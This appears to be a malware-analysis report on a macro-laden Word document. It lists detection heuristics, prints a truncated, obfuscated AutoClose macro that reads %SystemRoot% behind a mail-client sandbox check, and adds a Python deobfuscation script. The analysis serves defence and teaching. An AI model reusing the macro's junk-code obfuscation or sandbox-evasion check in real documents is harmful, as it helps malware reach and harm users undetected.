Verdict: MALICIOUS
Risk Score: 210
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Word document containing VBA macros. High-severity heuristics flag the AutoOpen and Auto_Close auto-execution entry points and a CreateObject call, and the compiled p-code stream pairs an auto-execution token with shell/download/object-execution tokens. The decoded source preview shows only Sub AutoClose (module NewMacros), padded with junk arithmetic and boolean noise; the live statements build strings by concatenating fragments (for example ngcmrlv & wqsui yields "temp"), read Environ("Sys" & kvvmfy & "temRoot"), where kvvmfy is never assigned in the preview and so contributes an empty string, giving %SystemRoot%, and then append "\sys" to that path, consistent with staging a second-stage payload under the Windows directory. The Environ read is guarded by Val(Application.MailSystem) Like Val(1), which is true only when Word reports a MAPI mail client (wdMAPI = 1), a check used to avoid running in sandboxes that have no mail client configured. The payload and its download location are obfuscated and the preview is truncated before any CreateObject call, so no family attribution is made. Note that the legacy WordBasic marker heuristic's wording ("no modern VBA project was recovered") is generic rule text; a 212433-byte VBA source was in fact extracted from this sample.
Heuristics (8)
- VBA macros detected (medium; 5 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- Auto_Close macro (high) [OLE_VBA_AUTOCLOSE]: Auto_Close macro.
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]: Environ() call (env variable access).
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML schema namespace present in ordinary Office files and is not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 212433 bytes | a8909501aa502819b6baf7edf55b8b1b062d8f14581055fcb6305f5ce99fcad7 |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoClose()
yfpufh = "ooogm"
ornutpxiem = -85 / 136
wj = -34263
fpxhevm = (Not wj)
uwmie61 = -139 + 56
ylupxq = "bbohma"
fxkqczaeye = -121 / 57
v = 10935
uea = -33141
weea = Not (v < uea)
puuokckrz = -134 + 38
ucp = -27289
oayi = (Not ucp)
oenkloeo = -112 - 89
yogya = "sfwcjoidjpf+"
mio = -13941
uou = (Not mio)
gk = -47620
x = (Not gk)
kx = 7384
l = (Not kx)
Dim turuunfy As String
turuunfy = -144 * 145
aeazqkay = -96 - 7
umekxevfyo = -12 / 179
kmwzkp = -16283
yu = (Not kmwzkp)
oeytqe = "$upekleoa"
aa = 40128
hsi = -40409
ui = Not (aa <= hsi)
agzzormu = -95 + 39
cyie = -176 - 8
mbnwxi = 8199
l = -23162
yori = Not (mbnwxi >= l)
E = 64191
vcjc = 19538
yoa = Not (E >= vcjc)
sojo = "zjzscyqyiuoi+$tsxxqxpmyioi"
uog = -713
pgwlyq9 = 60849
io = Not (uog > pgwlyq9)
ngcmrlv = "te"
eayodfrw = -3 / 43
mepo7 = -50524
jv = (Not mepo7)
uu = -49880
k = (Not uu)
wqsui = "mp"
ajtaoie = -151 + 60
a = 49085
ajf = (Not a)
chxmi = 22877
jr = -9842
gje = Not (chxmi >= jr)
szsgjpou = ngcmrlv & wqsui
yyou = -11863
E = 49224
rwuyu0 = Not (yyou <= E)
qmrtlmqlkibq = -6 + 46
xginjtf = -156 - 31
aejaooe = -63 + 133
staioa = "exruaeiyu+$i"
mttwgb2 = 61513
oeu = (Not mttwgb2)
lupc0 = -147 - 101
ulquxopo = -132 - 97
bxnbykwi = -91 + 20
ykpfuo = -1 + 130
igjedyy = -47 - 12
yy = 64057
y = 6834
joxk7 = Not (yy > y)
eiiclz = -165 + 110
mglco = "ghwbhgahk"
epzo = -154 * 121
ezrnux = -65 * 97
oeuou = -157 * 54
yupnym = "vgqcisawss90+$"
ouyhyrv = -169 / 104
iutqvp = -133 * 153
xc = -19776
aty = (Not xc)
bdeqsc = yfpufh & ylupxq & yogya & oeytqe & sojo & staioa & mglco & yupnym
qmektfr = -14023
i = (Not qmektfr)
tpushcx = 48295
gerr = (Not tpushcx)
dt = -60991
y = -49566
ffgf = Val(Application.MailSystem) Like Val(1)
aydv = Not (dt > y)
If ffgf Then
wkjokyuhte = Environ("Sys" & kvvmfy & "temRoot")
eae = -8305
End If
ucy = -46367
lqkho = Not (eae <= ucy)
eyzkob = -160 / 171
iavdg = -65964
l = 62714
l = Not (iavdg >= l)
ilmeuoi = -88 - 137
Dim oyucjeqf As String
oyucjeqf = -97 - 70
vyuefn52 = -150 / 51
ildbhuia40 = -152 * 50
ffeem = "xdyfrewojjay"
uo = -26566
y = (Not uo)
bwurqhc = -38216
a = -163
rty = Not (bwurqhc >= a)
jrygqsgca = -104 / 44
Dim eurkq, ieooo18 As String
eurkq = -147 + 96
hykdvmfo = "a+$zdtcf"
xrukbjigdi = -137 + 117
jliasiu = -1 + 81
qjauu81 = -91 / 40
ruogac = -145 - 92
oexxinci9 = "lqeydhqrrfbnnfv"
eui = 16233
a = (Not eui)
enpwrd = -123 + 149
gg = 6809
d = 43124
iwyr = Not (gg <= d)
rtscui = -92 / 44
ytcralczr5 = "bylz+$yifgbxoy"
sfsno = 20490
kzvvej = (Not sfsno)
akleurjf = -53 - 155
xkgiaya = "dacceoetj2+$e"
aioeuhtybx = -129 + 62
Dim ucyoyyy As Integer
ucyoyyy = -82 + 21
eqqpxegf = "oeooxf"
Dim rnpseftw05 As String
rnpseftw05 = -108 + 62
eoruhy = -75 / 134
okgyiera = -82 - 47
acbfpwy = "lujrxeos"
arfyii = -27 * 102
uetcqyoa = -85 / 71
d = 58063
yq = 22551
eacca = Not (d >= yq)
h = 61742
roam = 15366
uu = Not (h < roam)
s = 22503
n = (Not s)
wkjokyuhte = wkjokyuhte + "\sys"
you = -6660
oqdl94 = -25051
qdh = Not (you < oqdl94)
zaytlu = -5 - 77
eepq = -113 - 111
bqyoo = -97 - 35
aspaa = "yone+$nylfye"
dcdzo = -30 / 101
u = -44792
ymh = 34170
o = Not (u <= ymh)
yhhiuuapxnd = -118 + 69
uyoiqsa = -134 / 178
brsvywpn = "uyppf"
yy = 52541
tvxu04 = (Not yy)
ww = 6297
xfo = -35971
v = Not (ww < xfo)
ayqawf = -173 * 106
yucggipki = -165 + 89
badzqe = ffeem & hykdvmfo & oexxinci9 & ytcralczr5 & xkgiaya & eqqpxegf & acbfpwy & aspaa & brsvywpn
Dim ztwbaohi As String
ztwbaohi = -173 + 145
ab = 7309
lvzboo = -18407
ilg = Not (ab > lvzboo)
Dim cqweajj As String
cqweajj = -154 + 137
Dim almyg As String
almyg = -136 + 99
sgif03 = -131 + 61
mbpziux91 = "e
```
... (truncated)
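Almost every line of the preview above is noise: arithmetic on throw-away variables and boolean comparisons whose results are never used. The statements that matter are the string literals, the `&`/`+` concatenations that join them, and the Environ() call. The following Python script is an added example for this page (not the analyzer's code and not the author's) showing how to strip the noise: it makes one linear pass over the source, tracks only assignments that resolve to strings, treats never-assigned identifiers such as kvvmfy as the empty Variant they are in VBA without Option Explicit, and marks Environ() results as %NAME%. It ignores control flow, so the Environ read inside the If is treated as taken, which is the branch an analyst wants to see. The embedded VBA is a constructed excerpt of the lines shown in the preview, not the full macros.bas.

```python
"""Resolve the string-building obfuscation seen in the extracted AutoClose macro.
Added example, not the analyzer's code. Linear pass over VBA source that tracks
only string-typed assignments (literals, &/+ concatenations of known strings,
Environ() calls) and drops the junk arithmetic and boolean noise. Identifiers
that are never assigned resolve to "" (empty Variant); control flow is ignored."""
import re

ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
STR_LIT = re.compile(r'^"([^"]*)"$')
IDENT = re.compile(r'^[A-Za-z_]\w*$')
ENVIRON = re.compile(r'^Environ\s*\((.*)\)$', re.IGNORECASE)


def split_concat(expr):
    """Split on & or + at parenthesis depth 0 and outside double quotes."""
    parts, cur, in_str, depth = [], [], False, 0
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == '(':
                depth += 1
            elif ch == ')':
                depth -= 1
            elif ch in '&+' and depth == 0:
                parts.append(''.join(cur).strip())
                cur = []
                continue
        cur.append(ch)
    parts.append(''.join(cur).strip())
    return [p for p in parts if p]


def resolve_operand(op, strings, non_strings):
    """Value of one operand, or None if it is not a string build."""
    m = STR_LIT.match(op)
    if m:
        return m.group(1)
    m = ENVIRON.match(op)
    if m:
        inner = resolve_expr(m.group(1), strings, non_strings)
        return None if inner is None else '%' + inner + '%'  # mark env-var expansion
    if IDENT.match(op):
        if op in strings:
            return strings[op]
        if op in non_strings:
            return None      # numeric/boolean variable: arithmetic, not a string
        return ''            # never assigned: empty Variant
    return None              # comparisons, calls, arithmetic: noise


def resolve_expr(expr, strings, non_strings):
    vals = [resolve_operand(p, strings, non_strings) for p in split_concat(expr)]
    if not vals or any(v is None for v in vals):
        return None
    return ''.join(vals)


def resolve_strings(src):
    """Map variable name -> final string value for every string-valued assignment."""
    strings, non_strings = {}, set()
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.group(1), m.group(2)
        val = resolve_expr(rhs, strings, non_strings)
        if val is None:
            non_strings.add(name)
            strings.pop(name, None)
        else:
            strings[name] = val
            non_strings.discard(name)
    return strings


def path_like(strings):
    """Resolved values that look like file-system paths or env-var expansions."""
    return {k: v for k, v in strings.items() if '%' in v or '\\' in v}


# Constructed excerpt of the preview shown on this page (not the full macros.bas).
SAMPLE = r"""Sub AutoClose()
yfpufh = "ooogm"
ornutpxiem = -85 / 136
wj = -34263
fpxhevm = (Not wj)
uwmie61 = -139 + 56
ylupxq = "bbohma"
yogya = "sfwcjoidjpf+"
oeytqe = "$upekleoa"
sojo = "zjzscyqyiuoi+$tsxxqxpmyioi"
ngcmrlv = "te"
wqsui = "mp"
szsgjpou = ngcmrlv & wqsui
staioa = "exruaeiyu+$i"
mglco = "ghwbhgahk"
yupnym = "vgqcisawss90+$"
bdeqsc = yfpufh & ylupxq & yogya & oeytqe & sojo & staioa & mglco & yupnym
ffgf = Val(Application.MailSystem) Like Val(1)
If ffgf Then
wkjokyuhte = Environ("Sys" & kvvmfy & "temRoot")
eae = -8305
End If
wkjokyuhte = wkjokyuhte + "\sys"
End Sub
"""

if __name__ == "__main__":
    resolved = resolve_strings(SAMPLE)
    for name, value in sorted(resolved.items(), key=lambda kv: -len(kv[1])):
        print(f"{name} = {value!r}")
    print("path-like:", path_like(resolved))
```

On the excerpt this recovers szsgjpou as "temp" and wkjokyuhte as %SystemRoot%\sys, while bdeqsc resolves to a long run of letters with embedded "+$" sequences that reads like a decoy PowerShell fragment; what the macro actually does with these strings lies beyond the truncated preview, so the script reports them without interpreting them.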